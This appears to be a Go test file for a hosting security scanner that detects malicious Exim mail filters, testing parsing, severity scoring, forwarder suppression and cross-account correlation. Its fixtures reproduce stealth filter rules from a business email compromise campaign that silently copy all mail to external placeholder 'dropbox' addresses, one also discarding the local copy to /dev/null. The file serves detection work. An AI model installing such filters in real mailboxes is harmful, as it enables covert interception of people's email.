package checks

import (
	"context"
	"os"
	"path/filepath"
	"strings"
	"testing"
	"time"

	"github.com/pidginhost/csm/internal/alert"
	"github.com/pidginhost/csm/internal/config"
)

// Real-world malicious filter bodies observed in a live BEC campaign. Each
// installs a stealth interception rule: copy every message to an attacker
// dropbox while keeping a local copy so the victim never notices.
//
// Documentation addresses (RFC 2606 example.* / a placeholder gmail) stand in
// for the real attacker dropboxes.
const filterAuraStealth = `# Exim filter - auto-generated by cPanel.
headers charset "UTF-8"

if not first_delivery and error_message then finish endif

#24
if
 $header_from: contains "@"
then
 deliver "dropbox001@gmail.com"
 deliver "\"$local_part+INBOX\"@$domain"
endif
`

const filterVioricaStealth = `# Exim filter - auto-generated by cPanel.
headers charset "UTF-8"

if not first_delivery and error_message then finish endif

#.
if
 foranyaddress $h_to:,$h_cc: ( $thisaddress contains "@" )
then
 save "$home/mail/example.com/viorica/"
 deliver "dropbox811@gmail.com"
endif
`

const filterOanaStealth = `# Exim filter - auto-generated by cPanel.
headers charset "UTF-8"

if not first_delivery and error_message then finish endif

#26
if
 $header_from: contains "@"
then
 deliver "dropbox-lives@gmail.com"
 save "$home/mail/example.com/oana/" 660
endif
`

// Legitimate: owner duplicates mail from specific senders into their own
// inbox. No external destination, narrow conditions. Must not alert.
const filterGeorgeLegit = `# Exim filter - auto-generated by cPanel.
headers charset "UTF-8"

if not first_delivery and error_message then finish endif

#uniqa.ro
if
 $header_from: contains "uniqa.ro"
then
 save "$home/mail/example.com/george/" 660
endif

#crowdestate.eu
if
 $header_from: contains "crowdestate.eu"
then
 deliver "\"$local_part+INBOX\"@$domain"
endif
`

// Plain external forward of one mailbox, no local copy, narrow condition.
// Suspicious only when newly added.
const filterPlainForward = `# Exim filter - auto-generated by cPanel.
headers charset "UTF-8"

if not first_delivery and error_message then finish endif

#office
if
 $header_to: contains "office@example.com"
then
 deliver "owner-personal@gmail.com"
endif
`

// External forward + /dev/null: intercept one sender and hide it. Stealth.
const filterDevNullIntercept = `# Exim filter - auto-generated by cPanel.
headers charset "UTF-8"

if not first_delivery and error_message then finish endif

#spy
if
 $header_from: contains "@boss.example.net"
then
 deliver "spy@gmail.com"
 save "/dev/null" 660
endif
`

func TestParseEximFilterStealthRule(t *testing.T) {
	rules := parseEximFilter(filterAuraStealth)

	// The boilerplate "if not first_delivery..." plus the #24 rule -> two rules,
	// but only the #24 rule carries deliver actions.
	var stealth *filterRule
	for i := range rules {
		if len(rules[i].actions) == 2 {
			stealth = &rules[i]
		}
	}
	if stealth == nil {
		t.Fatalf("parseEximFilter did not return the two-action stealth rule; got %+v", rules)
	}
	if !stealth.matchesAll {
		t.Errorf("stealth rule should match all mail (From contains @); condition=%q", stealth.condition)
	}
	if stealth.actions[0].verb != "deliver" || stealth.actions[0].arg != "dropbox001@gmail.com" {
		t.Errorf("action[0] = %+v, want deliver dropbox001@gmail.com", stealth.actions[0])
	}
	// Escaped quotes in the self re-delivery must survive tokenizing.
	if stealth.actions[1].verb != "deliver" || !strings.Contains(stealth.actions[1].arg, "$local_part+INBOX") {
		t.Errorf("action[1] = %+v, want self +INBOX re-delivery", stealth.actions[1])
	}
}

func TestParseEximFilterSingleLineFinishIsNotMatchAll(t *testing.T) {
	rules := parseEximFilter(filterAuraStealth)
	for _, r := range rules {
		if len(r.actions) == 1 && r.actions[0].verb == "finish" {
			if r.matchesAll {
				t.Errorf("boilerplate finish rule must not be match-all; condition=%q", r.condition)
			}
			return
		}
	}
	t.Fatalf("single-line finish rule not parsed: %+v", rules)
}

func TestConditionMatchesAll(t *testing.T) {
	tests := []struct {
		cond string
		all  bool
	}{
		{`$header_from: contains "@"`, true},
		{`foranyaddress $h_to:,$h_cc: ( $thisaddress contains "@" )`, true},
		{`$header_to: contains "office@example.com"`, false},
		{`$header_from: contains "uniqa.ro"`, false},
		{`$header_subject: contains "Cod autentificare"`, false},
		{"", true}, // unconditional
		{`not first_delivery and error_message`, false},
	}
	for _, tt := range tests {
		if got := conditionMatchesAll(tt.cond); got != tt.all {
			t.Errorf("conditionMatchesAll(%q) = %v, want %v", tt.cond, got, tt.all)
		}
	}
}

func TestScoreFilterRulesStealthIsCriticalExfil(t *testing.T) {
	localDomains := map[string]bool{"example.com": true}

	cases := []struct {
		name string
		body string
		mb   filterMailbox
	}{
		{"aura", filterAuraStealth, filterMailbox{localPart: "aura", domain: "example.com"}},
		{"viorica", filterVioricaStealth, filterMailbox{localPart: "viorica", domain: "example.com"}},
		{"oana", filterOanaStealth, filterMailbox{localPart: "oana", domain: "example.com"}},
	}
	for _, tc := range cases {
		t.Run(tc.name, func(t *testing.T) {
			rules := parseEximFilter(tc.body)
			got := scoreFilterRules(rules, tc.mb, localDomains, nil)

			var exfil *filterFinding
			for i := range got {
				if got[i].kind == "exfil" {
					exfil = &got[i]
				}
			}
			if exfil == nil {
				t.Fatalf("expected an exfil finding, got %+v", got)
			}
			if exfil.severity != alert.Critical {
				t.Errorf("exfil severity = %v, want Critical", exfil.severity)
			}
			if exfil.onlyIfNew {
				t.Error("stealth exfil must alert regardless of newness")
			}
			if !strings.Contains(exfil.dest, "@gmail.com") {
				t.Errorf("exfil dest = %q, want the external dropbox", exfil.dest)
			}
		})
	}
}

func TestScoreFilterRulesLegitOwnerCopyNoFinding(t *testing.T) {
	localDomains := map[string]bool{"example.com": true}
	rules := parseEximFilter(filterGeorgeLegit)
	got := scoreFilterRules(rules, filterMailbox{localPart: "george", domain: "example.com"}, localDomains, nil)
	if len(got) != 0 {
		t.Fatalf("legit owner copy must not produce findings; got %+v", got)
	}
}

func TestScoreFilterRulesPlainForwardOnlyIfNew(t *testing.T) {
	localDomains := map[string]bool{"example.com": true}
	rules := parseEximFilter(filterPlainForward)
	got := scoreFilterRules(rules, filterMailbox{localPart: "office", domain: "example.com"}, localDomains, nil)
	if len(got) != 1 {
		t.Fatalf("plain forward should yield one finding; got %+v", got)
	}
	if got[0].kind != "forwarder" || got[0].severity != alert.High {
		t.Errorf("plain forward finding = %+v, want forwarder/High", got[0])
	}
	if !got[0].onlyIfNew {
		t.Error("plain external forward should only alert when newly added")
	}
}

func TestScoreFilterRulesDevNullInterceptIsStealth(t *testing.T) {
	localDomains := map[string]bool{"example.com": true}
	rules := parseEximFilter(filterDevNullIntercept)
	got := scoreFilterRules(rules, filterMailbox{localPart: "ceo", domain: "example.com"}, localDomains, nil)
	var exfil *filterFinding
	for i := range got {
		if got[i].kind == "exfil" {
			exfil = &got[i]
		}
	}
	if exfil == nil || exfil.severity != alert.Critical || exfil.onlyIfNew {
		t.Fatalf("external + /dev/null must be a non-gated Critical exfil; got %+v", got)
	}
}

func TestScoreFilterRulesSuppressedByKnownForwarder(t *testing.T) {
	localDomains := map[string]bool{"example.com": true}
	rules := parseEximFilter(filterPlainForward)
	known := []string{"office@example.com: owner-personal@gmail.com"}
	got := scoreFilterRules(rules, filterMailbox{localPart: "office", domain: "example.com"}, localDomains, known)
	if len(got) != 0 {
		t.Fatalf("known forwarder must be suppressed; got %+v", got)
	}
}

func TestMailboxFromFilterPath(t *testing.T) {
	tests := []struct {
		path string
		mb   filterMailbox
	}{
		{"/home/u/etc/example.com/aura/filter", filterMailbox{localPart: "aura", domain: "example.com"}},
		{"/etc/vfilters/example.com", filterMailbox{localPart: "*", domain: "example.com"}},
	}
	for _, tt := range tests {
		got := mailboxFromFilterPath(tt.path)
		if got != tt.mb {
			t.Errorf("mailboxFromFilterPath(%q) = %+v, want %+v", tt.path, got, tt.mb)
		}
	}
}

// Integration: CheckMailFilters scans per-mailbox filters under /home and
// flags the stealth filter as a non-gated critical exfil even on first scan.
func TestCheckMailFiltersFlagsStealthOnFirstScan(t *testing.T) {
	withTestStore(t)
	now := time.Date(2026, 6, 4, 12, 0, 0, 0, time.UTC)
	path := "/home/lifecontro/etc/example.com/aura/filter"

	withMockOS(t, &mockOS{
		glob: func(pattern string) ([]string, error) {
			if pattern == filepath.Join("/home", "*", "etc", "*", "*", "filter") {
				return []string{path}, nil
			}
			return nil, nil
		},
		stat: mtimesByPath(map[string]time.Time{path: now}),
		readFile: func(name string) ([]byte, error) {
			switch name {
			case "/etc/localdomains":
				return []byte("example.com\n"), nil
			case path:
				return []byte(filterAuraStealth), nil
			}
			return nil, os.ErrNotExist
		},
	})

	findings := CheckMailFilters(context.Background(), &config.Config{}, nil)
	if len(findings) != 1 {
		t.Fatalf("len(findings) = %d, want 1: %+v", len(findings), findings)
	}
	f := findings[0]
	if f.Check != "email_filter_exfil" || f.Severity != alert.Critical {
		t.Fatalf("finding = %+v, want email_filter_exfil/Critical", f)
	}
	if f.Domain != "example.com" || f.Mailbox != "aura@example.com" {
		t.Errorf("tenant fields = domain %q mailbox %q, want example.com / aura@example.com", f.Domain, f.Mailbox)
	}
}

// Cross-account: the same dropbox address across two mailboxes is a campaign;
// findings must be annotated and stay critical.
func TestCheckMailFiltersCrossAccountCorrelation(t *testing.T) {
	withTestStore(t)
	now := time.Date(2026, 6, 4, 12, 0, 0, 0, time.UTC)
	p1 := "/home/u1/etc/example.com/a/filter"
	p2 := "/home/u2/etc/example.org/b/filter"
	shared := `headers charset "UTF-8"
if
 $header_from: contains "@"
then
 deliver "shared-dropbox@gmail.com"
 save "$home/mail/x/y/"
endif
`
	withMockOS(t, &mockOS{
		glob: func(pattern string) ([]string, error) {
			if pattern == filepath.Join("/home", "*", "etc", "*", "*", "filter") {
				return []string{p1, p2}, nil
			}
			return nil, nil
		},
		stat: mtimesByPath(map[string]time.Time{p1: now, p2: now.Add(-time.Minute)}),
		readFile: func(name string) ([]byte, error) {
			switch name {
			case "/etc/localdomains":
				return []byte("example.com\nexample.org\n"), nil
			case p1, p2:
				return []byte(shared), nil
			}
			return nil, os.ErrNotExist
		},
	})

	findings := CheckMailFilters(context.Background(), &config.Config{}, nil)
	if len(findings) != 2 {
		t.Fatalf("len(findings) = %d, want 2: %+v", len(findings), findings)
	}
	for _, f := range findings {
		if !strings.Contains(strings.ToLower(f.Details), "cross-account") {
			t.Errorf("finding missing cross-account annotation: %+v", f)
		}
	}
}

func TestCheckMailFiltersThrottled(t *testing.T) {
	db := withTestStore(t)
	if err := db.SetMetaString("email:mailfilter_last_refresh", time.Now().Format(time.RFC3339)); err != nil {
		t.Fatal(err)
	}
	called := false
	withMockOS(t, &mockOS{
		glob: func(string) ([]string, error) { called = true; return nil, nil },
	})
	cfg := &config.Config{}
	cfg.EmailProtection.PasswordCheckIntervalMin = 1440
	findings := CheckMailFilters(context.Background(), cfg, nil)
	if len(findings) != 0 {
		t.Fatalf("throttled run should return no findings; got %+v", findings)
	}
	if called {
		t.Error("throttled run should not glob the filesystem")
	}
}
